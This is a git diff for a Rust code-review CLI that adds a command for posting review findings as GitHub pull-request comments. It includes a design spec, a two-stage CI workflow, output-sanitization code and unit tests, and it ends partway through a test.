+```bash
+git add src/github_report.rs
+git commit -m "test(github): add integration test with mock HTTP server (#313)"
+```
+
+---
+
+### Task 13: Final Verification
+
+- [ ] **Step 1: Run full test suite**
+
+Run: `cargo test --bin quorum 2>&1 | tail -10`
+Expected: all tests pass (including all new github_report tests)
+
+- [ ] **Step 2: Run clippy**
+
+Run: `cargo clippy --bin quorum -- -D warnings 2>&1 | tail -10`
+Expected: clean
+
+- [ ] **Step 3: Run rustfmt**
+
+Run: `cargo fmt --all -- --check 2>&1`
+Expected: no formatting issues
+
+- [ ] **Step 4: Test CLI help**
+
+Run: `cargo run -- report --help 2>&1` and `cargo run -- review --help 2>&1 | grep github`
+Expected: both show the expected flags
+
+- [ ] **Step 5: Push branch and open PR**
+
+```bash
+git push -u origin feat/github-pr-comments
+gh pr create --title "feat: native GitHub PR comment support (#313)" \
+  --body "$(cat <<'EOF'
+## Summary
+- Add `quorum report` subcommand for posting findings to GitHub PRs
+- Add `--github-pr` convenience flag on `quorum review`
+- Two-stage workflow_run CI pattern for fork safety
+- Always-on output sanitization for PR comment bodies
+- Dismiss-and-replace protocol for re-runs
+
+## Test plan
+- [ ] Unit tests for sanitize_for_github (12 cases)
+- [ ] Unit tests for Markdown rendering (5 cases)
+- [ ] Unit tests for commentability validation (4 cases)
+- [ ] Unit tests for repo URL parsing (6 cases)
+- [ ] Unit tests for marker protocol (4 cases)
+- [ ] Integration test with mock HTTP server
+- [ ] CI compact mode detection test
+- [ ] Manual test: `quorum review --json > /tmp/f.json && quorum report /tmp/f.json --pr <N>`
+
+🤖 Generated with [Claude Code](https://claude.com/claude-code)
+EOF
+)"
+```

--- a/docs/superpowers/specs/2026-05-25-github-pr-comments-design.md
+++ b/docs/superpowers/specs/2026-05-25-github-pr-comments-design.md
@@ -1,0 +1,491 @@
+# Design: Native GitHub PR Comment Support
+
+**Issue:** #313
+**Date:** 2026-05-25
+**Version target:** 0.27.0
+
+## Summary
+
+Add native support for posting review findings as GitHub PR review comments,
+enabling CI integration without wrapper scripts. Two entry points: a standalone
+`quorum report` subcommand for two-stage CI (Stage 2), and a `--github-pr`
+convenience flag on `quorum review` for single-stage privileged contexts.
+
+## Architecture
+
+A single new module `src/github_report.rs` owns all GitHub API interaction.
+Both entry points call into it with the same `PostReviewRequest` struct.
+
+```
+review pipeline -> Vec<Finding> -> stdout (Human/Compact/JSON, unchanged)
+                                \-> github_report module -> GitHub API (new)
+```
+
+The existing output flow is untouched. GitHub posting is a side-effect that
+happens after stdout output is written.
+
+### Module: `src/github_report.rs`
+
+Public API:
+
+```rust
+pub struct PostReviewRequest {
+    pub owner: String,
+    pub repo: String,
+    pub pr_number: u64,
+    pub token: String,
+    pub findings: Vec<Finding>,
+    pub diff_text: String,       // PR diff for commentability validation
+    pub version: String,         // quorum version for marker
+    pub run_id: String,          // ULID for marker traceability
+    pub commit_sha: String,      // PR HEAD for commit_id field
+}
+
+pub struct PostReviewResult {
+    pub review_id: u64,
+    pub inline_count: usize,
+    pub body_count: usize,
+    pub dismissed_previous: Option<u64>,
+}
+
+pub async fn post_review(
+    client: &reqwest::Client,
+    req: &PostReviewRequest,
+) -> Result<PostReviewResult, GitHubReportError>;
+```
+
+### Internal pipeline within `post_review`:
+
+1. **Classify posting targets** — parse `diff_text` into hunk ranges per file,
+   map each finding to `(path, anchor_line, side)`, verify the line falls
+   within a commentable hunk range. Findings that fail validation are
+   downgraded to the review body.
+
+2. **Dismiss previous review** — list existing reviews via
+   `GET /repos/{owner}/{repo}/pulls/{pr}/reviews`, scan for the
+   `quorum-review-marker` in the body, dismiss via
+   `PUT .../reviews/{id}/dismissals`. Best-effort: 403/404 on dismiss is
+   logged to stderr, not fatal. The new review is posted regardless.
+
+3. **Sanitize all text** — run `sanitize_for_github()` on every finding
+   title, description, suggested_fix, and evidence entry.
+
+4. **Build review payload** — construct the GitHub review API request:
+   - `event: "COMMENT"`
+   - `commit_id`: PR HEAD SHA
+   - `body`: summary + out-of-diff findings + marker
+   - `comments[]`: inline comments for diff-visible findings
+
+5. **Post review** — `POST /repos/{owner}/{repo}/pulls/{pr}/reviews`
+
+## CLI Surface
+
+### `quorum report` subcommand
+
+```
+quorum report <findings-file | -> --pr <number> [options]
+```
+
+| Flag | Default | Description |
+|------|---------|-------------|
+| `<file>` or `-` | required | JSON findings file path, or `-` for stdin |
+| `--pr <N>` | required | PR number to post to |
+| `--github-token` | `GITHUB_TOKEN` env | Override authentication token |
+| `--github-repo` | auto-detect | Override `owner/repo` (format: `owner/repo`) |
+| `--diff-file` | fetch from GitHub | Local diff file; if omitted, fetched from PR API |
+
+**Repo auto-detection order:**
+1. `--github-repo` flag
+2. `GITHUB_REPOSITORY` environment variable
+3. Parse `git remote get-url origin` (handles both HTTPS and SSH URLs)
+
+**Exit codes:** 0 = posted successfully, 3 = posting failure (network, auth, API error).
+
+### `quorum review --github-pr`
+
+```
+quorum review src/*.rs --github-pr <number> [--github-token <token>]
+```
+
+Runs the normal review pipeline, writes findings to stdout in the active
+output mode, then calls `post_review()`. If posting fails, the review exit
+code (0/1/2) is preserved — the error goes to stderr. The findings are
+already on stdout, so the user gets them regardless.
+
+When `--github-pr` is set and `--diff-file` is not provided, the PR diff
+is fetched from GitHub and used both for diff-scoped review and for
+commentability validation.
+
+### CLI structs (src/cli/mod.rs)
+
+```rust
+// Add to Command enum:
+/// Post review findings as GitHub PR comments
+Report(ReportOpts),
+
+// New struct:
+#[derive(Parser)]
+pub struct ReportOpts {
+    /// JSON findings file path, or "-" for stdin
+    pub findings_file: String,
+
+    /// Pull request number
+    #[arg(long)]
+    pub pr: u64,
+
+    /// GitHub personal access token (default: GITHUB_TOKEN env)
+    #[arg(long, env = "GITHUB_TOKEN", hide_env_values = true)]
+    pub github_token: Option<String>,
+
+    /// Repository in owner/repo format (default: auto-detect)
+    #[arg(long)]
+    pub github_repo: Option<String>,
+
+    /// Local diff file (default: fetch from PR API)
+    #[arg(long)]
+    pub diff_file: Option<PathBuf>,
+}
+
+// Add to ReviewOpts:
+/// Post findings as GitHub PR review comments
+#[arg(long)]
+pub github_pr: Option<u64>,
+
+/// GitHub personal access token (default: GITHUB_TOKEN env)
+#[arg(long, env = "GITHUB_TOKEN", hide_env_values = true)]
+pub github_token: Option<String>,
+
+/// Repository in owner/repo format (default: auto-detect)
+#[arg(long)]
+pub github_repo: Option<String>,
+```
+
+## Output Format
+
+### CI log output (stdout)
+
+Add `GITHUB_ACTIONS` to the compact mode auto-detection in DESIGN.md Section 2:
+
+```
+if --json flag OR !stdout.is_terminal() -> JSON
+else if --compact or CLAUDE_CODE or GITHUB_ACTIONS env -> Compact
+else -> Human
+```
+
+Note: the pipe-detection (`!stdout.is_terminal()`) takes priority. The
+`GITHUB_ACTIONS` detection matters when Actions provides a pseudo-TTY.
+
+### stderr during posting
+
+Compact, CI-friendly progress on stderr (only when stderr is a TTY or
+`GITHUB_ACTIONS` is set):
+
+```
+Posting 3 findings to PR #42... dismissed previous review... done
+```
+
+On failure:
+```
+Error: GitHub post failed: 401 Unauthorized (review exit code preserved: 1)
+```
+
+### PR comment format (Markdown)
+
+**Inline review comment** (one per finding, anchored on the diff line):
+
+```markdown
+**!** Unvalidated input passed to SQL query — `security`
+
+User input from request.query flows to db.execute()
+without sanitization. Use parameterized queries.
+
+*quorum 0.27.0 | gpt-5.4, ast*
+```
+
+Format rules (consistent with DESIGN.md):
+- Severity icon (`!`, `~`, `-`) bold, matching DESIGN.md Section 4
+- Title bold, category in inline code
+- Description as plain text
+- Source attribution in italics, includes version and model(s)
+- No emoji, no decoration, no box-drawing
+
+**Top-level review body:**
+
+```markdown
+<!-- quorum-review-marker:v1 run_id=01JTEST sha=abc1234 version=0.27.0 -->
+
+## Quorum Review
+
+3 findings (1 critical, 1 warning, 1 info) | 2 inline, 1 in summary
+
+### Findings outside changed lines
+
+**~** Session token not rotated after privilege change — `security` L89
+
+After role elevation, the existing session token persists.
+Rotate tokens on privilege change to prevent session fixation.
+
+*quorum 0.27.0 | gpt-5.4*
+```
+
+**Clean review (no findings):**
+
+```markdown
+<!-- quorum-review-marker:v1 run_id=01JTEST sha=abc1234 version=0.27.0 -->
+
+## Quorum Review
+
+No findings.
+```
+
+**Review body overflow:** If out-of-diff findings exceed 55,000 chars, stop
+appending and add: `... N additional findings omitted from review body.
+See CI artifact for full results.`
+
+## Dismiss-and-Replace Protocol
+
+Each quorum review includes a hidden HTML comment in the review body:
+
+```
+<!-- quorum-review-marker:v1 run_id=01JTEST sha=abc1234 version=0.27.0 -->
+```
+
+On re-run:
+1. `GET /repos/{owner}/{repo}/pulls/{pr}/reviews` — list all reviews
+2. Scan each review body for `quorum-review-marker`
+3. Dismiss matching reviews: `PUT .../reviews/{id}/dismissals` with
+   message "Superseded by updated quorum review"
+4. Post new review
+
+**Dismissal is best-effort.** If the token lacks dismiss permissions (e.g.,
+`GITHUB_TOKEN` on a non-protected branch), the 403/404 is logged to stderr
+and the new review is posted anyway. The marker metadata (run_id, sha)
+makes the latest review identifiable regardless.
+
+## Commentability Validation
+
+GitHub's Review API only accepts inline comments on lines visible in the
+PR diff (changed lines + context lines around hunks). The `in_diff` field
+on `Finding` is not sufficient — it indicates the finding is conceptually
+within changed code, but doesn't guarantee the specific `anchor_line()`
+is commentable.
+
+The `github_report` module performs explicit validation:
+
+1. Parse the PR diff into a map: `file_path -> Vec<(start_line, end_line)>`
+   representing commentable line ranges per file
+2. For each finding with `in_diff == Some(true)`:
+   - Look up the file path in the diff map
+   - Check if `anchor_line()` falls within any commentable range
+   - If yes: inline comment
+   - If no: downgrade to review body (listed under "Findings outside changed lines")
+3. Findings with `in_diff != Some(true)`: always review body
+
+This reuses the existing `parse_unified_diff()` infrastructure.
+
+## Output Sanitization
+
+Always-on for all text interpolated into PR comment bodies. A
+`sanitize_for_github()` function in `src/github_report.rs`:
+
+1. **Control characters** — strip ASCII control chars except `\n` and `\t`
+   (reuse pattern from `src/output/mod.rs::strip_control_chars`)
+2. **Backtick escape** — replace sequences of 3+ backticks with the same
+   count of backticks inside an inline code span, preventing Markdown
+   code fence breakout
+3. **@mention neutralization** — replace `@username` with `` `@username` ``
+   (renders as inline code, no notification triggered)
+4. **#ref neutralization** — replace `#123` with `` `#123` `` (no cross-link)
+5. **Image tag stripping** — remove `![alt](url)` Markdown images and
+   `<img ...>` HTML tags (exfiltration vector via URL parameters)
+6. **HTML anchor stripping** — remove `<a ...>...</a>` tags (prevent
+   arbitrary link injection)
+7. **Truncation** — individual comment bodies capped at 60,000 chars
+   (headroom under GitHub's 65,536 char limit)
+
+## GitHub API Details
+
+### Create review with inline comments
+
+```
+POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews
+Authorization: Bearer <token>
+
+{
+  "commit_id": "<PR HEAD SHA>",
+  "event": "COMMENT",
+  "body": "<review summary + marker>",
+  "comments": [
+    {
+      "path": "src/auth.rs",
+      "body": "<sanitized finding text>",
+      "line": 42,
+      "side": "RIGHT"
+    }
+  ]
+}
+```
+
+For multi-line findings (`line_start != line_end` and both in commentable
+range), use `start_line` and `start_side` fields for a multi-line comment.
+
+### List reviews
+
+```
+GET /repos/{owner}/{repo}/pulls/{pull_number}/reviews
+```
+
+### Dismiss review
+
+```
+PUT /repos/{owner}/{repo}/pulls/{pull_number}/reviews/{review_id}/dismissals
+
+{
+  "message": "Superseded by updated quorum review",
+  "event": "DISMISS"
+}
+```
+
+### Fetch PR diff (when --diff-file not provided)
+
+```
+GET /repos/{owner}/{repo}/pulls/{pull_number}
+Accept: application/vnd.github.diff
+```
+
+### Resolve PR from head SHA (Stage 2)
+
+```
+GET /repos/{owner}/{repo}/commits/{sha}/pulls
+```
+
+Returns PRs associated with a commit. Used in Stage 2 of the workflow_run
+pattern to resolve the PR number from trusted GitHub API data rather than
+from artifact files (artifact poisoning defense).
+
+## Exit Codes
+
+| Command | Success | Posting failure | Other error |
+|---------|---------|----------------|-------------|
+| `quorum report` | 0 | 3 | 3 |
+| `quorum review --github-pr` | review code (0/1/2) | review code + stderr error | 3 |
+
+For `review --github-pr`, the review's own exit code takes precedence.
+Posting failure is a non-fatal side-effect — the findings are already on
+stdout. The error is made clearly visible via stderr and trace events.
+
+## Dogfooding: `.github/workflows/quorum-review.yml`
+
+Two-stage `workflow_run` pattern per GitHub Security Lab recommendations:
+
+### Stage 1: `pull_request` (unprivileged)
+
+```yaml
+name: Quorum Review (analyze)
+on: [pull_request]
+
+jobs:
+  analyze:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Install quorum
+        run: cargo install --path . --locked
+      - name: Generate PR diff
+        run: gh pr diff ${{ github.event.pull_request.number }} > pr.diff
+        env:
+          GH_TOKEN: ${{ github.token }}
+      - name: Run review
+        run: quorum review --json --diff-file pr.diff $(git diff --name-only origin/main...HEAD) > findings.json
+        env:
+          QUORUM_BASE_URL: ${{ secrets.QUORUM_BASE_URL }}
+          QUORUM_API_KEY: ${{ secrets.QUORUM_API_KEY }}
+      - uses: actions/upload-artifact@v4
+        with:
+          name: quorum-findings
+          path: findings.json
+```
+
+### Stage 2: `workflow_run` (privileged)
+
+```yaml
+name: Quorum Review (report)
+on:
+  workflow_run:
+    workflows: ["Quorum Review (analyze)"]
+    types: [completed]
+
+jobs:
+  report:
+    if: github.event.workflow_run.conclusion == 'success'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Install quorum
+        run: cargo install --path . --locked
+      - uses: actions/download-artifact@v4
+        with:
+          name: quorum-findings
+          run-id: ${{ github.event.workflow_run.id }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+      - name: Post review
+        run: |
+          PR_NUMBER=$(gh api repos/${{ github.repository }}/commits/${{ github.event.workflow_run.head_sha }}/pulls --jq '.[0].number')
+          quorum report findings.json --pr "$PR_NUMBER"
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+```
+
+Security notes:
+- Stage 1 has no write permissions and no access to `GITHUB_TOKEN` on forks
+- Stage 2 resolves PR number from trusted GitHub API (head SHA), not from
+  artifact contents
+- `QUORUM_API_KEY` is only needed in Stage 1 (LLM calls); Stage 2 only
+  needs `GITHUB_TOKEN`
+- Never interpolate `github.*` context directly in `run:` blocks — use
+  `env:` mapping (script injection prevention)
+
+## DESIGN.md Updates
+
+### Section 2: Output Modes
+
+Add `GITHUB_ACTIONS` to the compact detection table:
+
+| Mode | When | Format | Audience |
+|------|------|--------|----------|
+| Human | stdout is a TTY, no flags | Styled findings | Terminal user |
+| Compact | `--compact` or `CLAUDE_CODE`/`GITHUB_ACTIONS` env | Token-optimized | LLM / CI log |
+| JSON | `--json` flag or stdout is piped | Machine-parseable | Scripts, pipes |
+
+### New Section 14: GitHub PR Comments
+
+Document the Markdown format, sanitization rules, severity icon mapping,
+and marker protocol as established in this spec.
+
+## Testing Strategy
+
+- **Unit tests** for `sanitize_for_github()` covering each sanitization rule
+- **Unit tests** for commentability validation (hunk parsing, line classification)
+- **Unit tests** for repo URL parsing (HTTPS, SSH, GitHub Enterprise)
+- **Unit tests** for marker parsing (find marker, extract metadata)
+- **Integration test** for review body construction (findings -> Markdown)
+- **Integration test** for the full `post_review()` flow with a mock HTTP server
+- **No live GitHub API tests in CI** — mock all HTTP interactions
+
+## Security Considerations
+
+1. **Fork safety**: `quorum report` must run in a privileged context (Stage 2
+   or internal PRs). Document this requirement prominently.
+2. **Prompt injection**: Existing `prompt_sanitize.rs` handles LLM prompt
+   safety. The new `sanitize_for_github()` handles output safety. These are
+   separate concerns at separate boundaries.
+3. **Secret redaction**: Existing `redact.rs` ensures no secrets appear in
+   findings. This applies before GitHub posting.
+4. **Artifact poisoning**: Stage 2 resolves PR number from GitHub API, not
+   from artifact files. Findings JSON from Stage 1 is untrusted input for
+   display purposes only — it cannot influence which PR gets commented on.
+5. **Token scope**: `GITHUB_TOKEN` is hidden from clap help via
+   `hide_env_values = true`. The token is only used for GitHub API calls,
+   never logged or included in findings.
+6. **SSRF**: GitHub API calls go to `api.github.com` (hardcoded). No
+   user-controlled URL construction for the GitHub API path.

--- a/src/cli/mod.rs
+++ b/src/cli/mod.rs
@@ -24,6 +24,8 @@ pub enum Command {
     Context(ContextOpts),
     /// Compute calibrator thresholds from feedback corpus
     Calibrate(CalibrateOpts),
+    /// Post review findings as GitHub PR comments
+    Report(ReportOpts),
     /// Print version
     Version,
 }
@@ -294,6 +296,28 @@ pub struct CalibrateOpts {
 }
 
 #[derive(Parser)]
+pub struct ReportOpts {
+    /// JSON findings file path, or "-" for stdin
+    pub findings_file: String,
+
+    /// Pull request number
+    #[arg(long)]
+    pub pr: u64,
+
+    /// GitHub personal access token (default: GITHUB_TOKEN env)
+    #[arg(long)]
+    pub github_token: Option<String>,
+
+    /// Repository in owner/repo format (default: auto-detect)
+    #[arg(long)]
+    pub github_repo: Option<String>,
+
+    /// Local diff file (default: fetch from PR API)
+    #[arg(long)]
+    pub diff_file: Option<PathBuf>,
+}
+
+#[derive(Parser)]
 pub struct StatsOpts {
     /// Output as JSON
     #[arg(long)]
@@ -505,6 +529,18 @@ pub struct ReviewOpts {
     /// Model for judge calls (default: gpt-5-nano, also: QUORUM_JUDGE_MODEL)
     #[arg(long)]
     pub judge_model: Option<String>,
+
+    /// Post findings as GitHub PR review comments
+    #[arg(long)]
+    pub github_pr: Option<u64>,
+
+    /// GitHub personal access token (default: GITHUB_TOKEN env)
+    #[arg(long)]
+    pub github_token: Option<String>,
+
+    /// Repository in owner/repo format (default: auto-detect)
+    #[arg(long)]
+    pub github_repo: Option<String>,
 }
 
 /// CLI surface for `--fp-kind` (#123 Layer 1). Variants map onto

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -7,6 +7,17 @@ use std::sync::LazyLock;
 const GITHUB_BODY_LIMIT: usize = 60_000;
 const REVIEW_BODY_LIMIT: usize = 55_000;
 
+fn truncate_utf8_safe(s: &mut String, max_bytes: usize) {
+    if s.len() <= max_bytes {
+        return;
+    }
+    let mut end = max_bytes;
+    while end > 0 && !s.is_char_boundary(end) {
+        end -= 1;
+    }
+    s.truncate(end);
+}
+
 // Matches @mention not preceded by a word char (e.g. not user@example.com).
 // Uses a capturing group with an optional non-word boundary prefix character.
 static RE_MENTION: LazyLock<Regex> =
@@ -32,6 +43,17 @@ pub enum PostingTarget {
     Body,
 }
 
+fn is_line_in_diff_ranges(file_path: &str, line: u32, diff_ranges: &DiffRanges) -> bool {
+    for (path, ranges) in diff_ranges {
+        if path == file_path {
+            return ranges
+                .iter()
+                .any(|&(start, end)| line >= start && line <= end);
+        }
+    }
+    false
+}
+
 pub fn classify_posting_target(
     finding: &Finding,
     file_path: &str,
@@ -42,19 +64,18 @@ pub fn classify_posting_target(
     }
 
     let anchor = finding.anchor_line();
-
-    for (path, ranges) in diff_ranges {
-        if path == file_path {
-            for &(start, end) in ranges {
-                if anchor >= start && anchor <= end {
-                    return PostingTarget::Inline;
-                }
-            }
-            return PostingTarget::Body;
-        }
+    if !is_line_in_diff_ranges(file_path, anchor, diff_ranges) {
+        return PostingTarget::Body;
     }
 
-    PostingTarget::Body
+    // For multiline comments, both ends must be in commentable ranges
+    if finding.line_start != finding.line_end
+        && !is_line_in_diff_ranges(file_path, finding.line_start, diff_ranges)
+    {
+        return PostingTarget::Body;
+    }
+
+    PostingTarget::Inline
 }
 
 pub fn sanitize_for_github(s: &str) -> String {
@@ -90,12 +111,7 @@ pub fn sanitize_for_github(s: &str) -> String {
     out = RE_ISSUE_REF.replace_all(&out, "${1}`#$2`").into_owned();
 
     // 7. Truncate
-    if out.len() > GITHUB_BODY_LIMIT {
-        out.truncate(GITHUB_BODY_LIMIT);
-        while !out.is_char_boundary(out.len()) {
-            out.pop();
-        }
-    }
+    truncate_utf8_safe(&mut out, GITHUB_BODY_LIMIT);
 
     out
 }
@@ -125,12 +141,7 @@ pub fn render_inline_comment(finding: &Finding, version: &str) -> String {
         version,
         source,
     );
-    if out.len() > GITHUB_BODY_LIMIT {
-        out.truncate(GITHUB_BODY_LIMIT);
-        while !out.is_char_boundary(out.len()) {
-            out.pop();
-        }
-    }
+    truncate_utf8_safe(&mut out, GITHUB_BODY_LIMIT);
     out
 }
 
@@ -256,6 +267,18 @@ pub fn parse_github_repo_url(url: &str) -> Option<(String, String)> {
         && let Some(path) = colon_part.split(':').nth(1)
     {
         return parse_owner_repo_from_path(path);
+    }
+
+    // SSH URL form: ssh://git@host/owner/repo.git
+    if url.starts_with("ssh://") {
+        let path = url
+            .split("://")
+            .nth(1)?
+            .split('/')
+            .skip(1) // skip user@hostname
+            .collect::<Vec<_>>()
+            .join("/");
+        return parse_owner_repo_from_path(&path);
     }
 
     // HTTPS: https://host/owner/repo.git
@@ -897,6 +920,15 @@ mod tests {
     }
 
     #[test]
+    fn sanitize_truncates_multibyte_safely() {
+        // 3-byte UTF-8 chars repeated to exceed limit, should not panic
+        let long = "\u{2603}".repeat(25_000); // snowman = 3 bytes each = 75K bytes
+        let result = sanitize_for_github(&long);
+        assert!(result.len() <= 60_000);
+        assert!(result.is_char_boundary(result.len()));
+    }
+
+    #[test]
     fn sanitize_no_false_positive_on_email() {
         assert_eq!(
             sanitize_for_github("email user@example.com here"),
@@ -979,6 +1011,26 @@ mod tests {
         assert_eq!(target, PostingTarget::Body);
     }
 
+    #[test]
+    fn classify_multiline_both_ends_in_diff() {
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,5 +40,7 @@\n context\n+added line\n+another\n+third\n context\n";
+        let ranges = crate::hydration::parse_unified_diff(diff);
+        let mut f = make_finding("test", 41, true);
+        f.line_end = 43;
+        let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+        assert_eq!(target, PostingTarget::Inline);
+    }
+
+    #[test]
+    fn classify_multiline_start_outside_diff() {
+        let diff = "--- a/src/auth.rs\n+++ b/src/auth.rs\n@@ -40,3 +40,5 @@\n context\n+added\n+added\n context\n";
+        let ranges = crate::hydration::parse_unified_diff(diff);
+        let mut f = make_finding("test", 42, true);
+        f.line_start = 30; // outside diff hunk
+        let target = classify_posting_target(&f, "src/auth.rs", &ranges);
+        assert_eq!(target, PostingTarget::Body);
+    }
+
     // --- Task 4 tests: URL parsing ---
 
     #[test]
@@ -1005,6 +1057,14 @@ mod tests {
     #[test]
     fn parse_repo_slash_format() {
         let (owner, repo) = parse_github_repo_url("jsnyder/quorum").unwrap();
+        assert_eq!(owner, "jsnyder");
+        assert_eq!(repo, "quorum");
+    }
+
+    #[test]
+    fn parse_repo_ssh_url() {
+        let (owner, repo) =
+            parse_github_repo_url("ssh://git@github.com/jsnyder/quorum.git").unwrap();
         assert_eq!(owner, "jsnyder");
         assert_eq!(repo, "quorum");
     }

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -487,6 +487,10 @@ fn github_client_headers(token: &str) -> reqwest::header::HeaderMap {
         reqwest::header::AUTHORIZATION,
         format!("Bearer {}", token).parse().unwrap(),
     );
+    headers.insert(
+        reqwest::header::USER_AGENT,
+        format!("quorum/{}", env!("CARGO_PKG_VERSION")).parse().unwrap(),
+    );
     headers.insert("X-GitHub-Api-Version", GITHUB_API_VERSION.parse().unwrap());
     headers
 }

--- a/src/github_report.rs
+++ b/src/github_report.rs
@@ -1,7 +1,9 @@
+use crate::finding::{Finding, Severity, Source};
 use regex::Regex;
 use std::sync::LazyLock;
 
 const GITHUB_BODY_LIMIT: usize = 60_000;
+const REVIEW_BODY_LIMIT: usize = 55_000;
 
 // Matches @mention not preceded by a word char (e.g. not user@example.com).
 // Uses a capturing group with an optional non-word boundary prefix character.
@@ -67,9 +69,310 @@ pub fn sanitize_for_github(s: &str) -> String {
     out
 }
 
+fn severity_icon(sev: &Severity) -> &'static str {
+    match sev {
+        Severity::Critical | Severity::High => "!",
+        Severity::Medium => "~",
+        Severity::Low | Severity::Info => "-",
+    }
+}
+
+fn source_label(source: &Source) -> &str {
+    source.provider_name()
+}
+
+pub fn render_inline_comment(finding: &Finding, version: &str) -> String {
+    let icon = severity_icon(&finding.severity);
+    let cat = finding.category.as_str();
+    let source = source_label(&finding.source);
+    let mut out = format!(
+        "**{}** {} — `{}`\n\n{}\n\n*quorum {} | {}*",
+        icon,
+        sanitize_for_github(&finding.title),
+        cat,
+        sanitize_for_github(&finding.description),
+        version,
+        source,
+    );
+    if out.len() > GITHUB_BODY_LIMIT {
+        out.truncate(GITHUB_BODY_LIMIT);
+        while !out.is_char_boundary(out.len()) {
+            out.pop();
+        }
+    }
+    out
+}
+
+pub fn render_body_finding(finding: &Finding, version: &str) -> String {
+    let icon = severity_icon(&finding.severity);
+    let cat = finding.category.as_str();
+    let line = finding.anchor_line();
+    let source = source_label(&finding.source);
+    format!(
+        "**{}** {} — `{}` L{}\n\n{}\n\n*quorum {} | {}*",
+        icon,
+        sanitize_for_github(&finding.title),
+        cat,
+        line,
+        sanitize_for_github(&finding.description),
+        version,
+        source,
+    )
+}
+
+fn format_summary_counts(inline_count: usize, body_findings: &[Finding]) -> String {
+    let total = inline_count + body_findings.len();
+
+    let mut crits = 0u32;
+    let mut warns = 0u32;
+    let mut infos = 0u32;
+    for f in body_findings {
+        match f.severity {
+            Severity::Critical | Severity::High => crits += 1,
+            Severity::Medium => warns += 1,
+            Severity::Low | Severity::Info => infos += 1,
+        }
+    }
+
+    let mut parts = Vec::new();
+    if crits > 0 {
+        parts.push(format!("{} critical", crits));
+    }
+    if warns > 0 {
+        parts.push(format!("{} warning", warns));
+    }
+    if infos > 0 {
+        parts.push(format!("{} info", infos));
+    }
+
+    let sev_summary = if parts.is_empty() {
+        String::new()
+    } else {
+        format!(" ({})", parts.join(", "))
+    };
+
+    let location = if body_findings.is_empty() {
+        String::new()
+    } else {
+        format!(" | {} inline, {} in summary", inline_count, body_findings.len())
+    };
+
+    format!("{} findings{}{}", total, sev_summary, location)
+}
+
+pub fn render_review_body(
+    marker: &str,
+    inline_count: usize,
+    body_findings: &[Finding],
+    version: &str,
+) -> String {
+    use std::fmt::Write;
+    let mut out = String::with_capacity(4096);
+    writeln!(out, "{}\n", marker).unwrap();
+
+    let total = inline_count + body_findings.len();
+    writeln!(out, "## Quorum Review\n").unwrap();
+
+    if total == 0 {
+        writeln!(out, "No findings.").unwrap();
+        return out;
+    }
+
+    let summary = format_summary_counts(inline_count, body_findings);
+    writeln!(out, "{}\n", summary).unwrap();
+
+    if body_findings.is_empty() {
+        return out;
+    }
+
+    writeln!(out, "### Findings outside changed lines\n").unwrap();
+
+    for (rendered_count, f) in body_findings.iter().enumerate() {
+        let entry = render_body_finding(f, version);
+        if out.len() + entry.len() + 100 > REVIEW_BODY_LIMIT {
+            let remaining = body_findings.len() - rendered_count;
+            writeln!(
+                out,
+                "\n... {} additional findings omitted from review body. See CI artifact for full results.",
+                remaining
+            )
+            .unwrap();
+            break;
+        }
+        writeln!(out, "{}\n", entry).unwrap();
+    }
+
+    out
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
+    use crate::category::Category;
+    use crate::finding::{Finding, Severity, Source};
+
+    #[test]
+    fn render_inline_comment_critical() {
+        let f = Finding {
+            id: "test".into(),
+            title: "SQL injection".into(),
+            description: "User input flows to query".into(),
+            severity: Severity::Critical,
+            category: Category::Security,
+            source: Source::Llm("gpt-5.4".into()),
+            line_start: 42,
+            line_end: 42,
+            evidence: vec![],
+            calibrator_action: None,
+            similar_precedent: vec![],
+            canonical_pattern: None,
+            suggested_fix: None,
+            based_on_excerpt: None,
+            reasoning: None,
+            llm_confidence: None,
+            confidence: None,
+            cited_lines: None,
+            grounding_status: None,
+            grounding_confidence: None,
+            model_agreement: None,
+            rule_id: None,
+            judge_verdict: None,
+            judge_confidence: None,
+            precision_tier: None,
+            in_diff: Some(true),
+        };
+        let result = render_inline_comment(&f, "0.27.0");
+        assert!(result.contains("**!** SQL injection"));
+        assert!(result.contains("`security`"));
+        assert!(result.contains("User input flows to query"));
+        assert!(result.contains("*quorum 0.27.0 | gpt-5.4*"));
+    }
+
+    #[test]
+    fn render_body_finding_includes_line() {
+        let f = Finding {
+            id: "test".into(),
+            title: "Token not rotated".into(),
+            description: "Session fixation risk".into(),
+            severity: Severity::Medium,
+            category: Category::Security,
+            source: Source::LocalAst,
+            line_start: 89,
+            line_end: 89,
+            evidence: vec![],
+            calibrator_action: None,
+            similar_precedent: vec![],
+            canonical_pattern: None,
+            suggested_fix: None,
+            based_on_excerpt: None,
+            reasoning: None,
+            llm_confidence: None,
+            confidence: None,
+            cited_lines: None,
+            grounding_status: None,
+            grounding_confidence: None,
+            model_agreement: None,
+            rule_id: None,
+            judge_verdict: None,
+            judge_confidence: None,
+            precision_tier: None,
+            in_diff: None,
+        };
+        let result = render_body_finding(&f, "0.27.0");
+        assert!(result.contains("**~** Token not rotated"));
+        assert!(result.contains("L89"));
+    }
+
+    #[test]
+    fn render_review_body_clean() {
+        let body = render_review_body("<!-- quorum-review-marker:v1 -->", 0, &[], "0.27.0");
+        assert!(body.contains("quorum-review-marker"));
+        assert!(body.contains("No findings."));
+    }
+
+    #[test]
+    fn render_review_body_with_summary() {
+        let f = Finding {
+            id: "test".into(),
+            title: "Issue".into(),
+            description: "Desc".into(),
+            severity: Severity::High,
+            category: Category::Security,
+            source: Source::LocalAst,
+            line_start: 10,
+            line_end: 10,
+            evidence: vec![],
+            calibrator_action: None,
+            similar_precedent: vec![],
+            canonical_pattern: None,
+            suggested_fix: None,
+            based_on_excerpt: None,
+            reasoning: None,
+            llm_confidence: None,
+            confidence: None,
+            cited_lines: None,
+            grounding_status: None,
+            grounding_confidence: None,
+            model_agreement: None,
+            rule_id: None,
+            judge_verdict: None,
+            judge_confidence: None,
+            precision_tier: None,
+            in_diff: None,
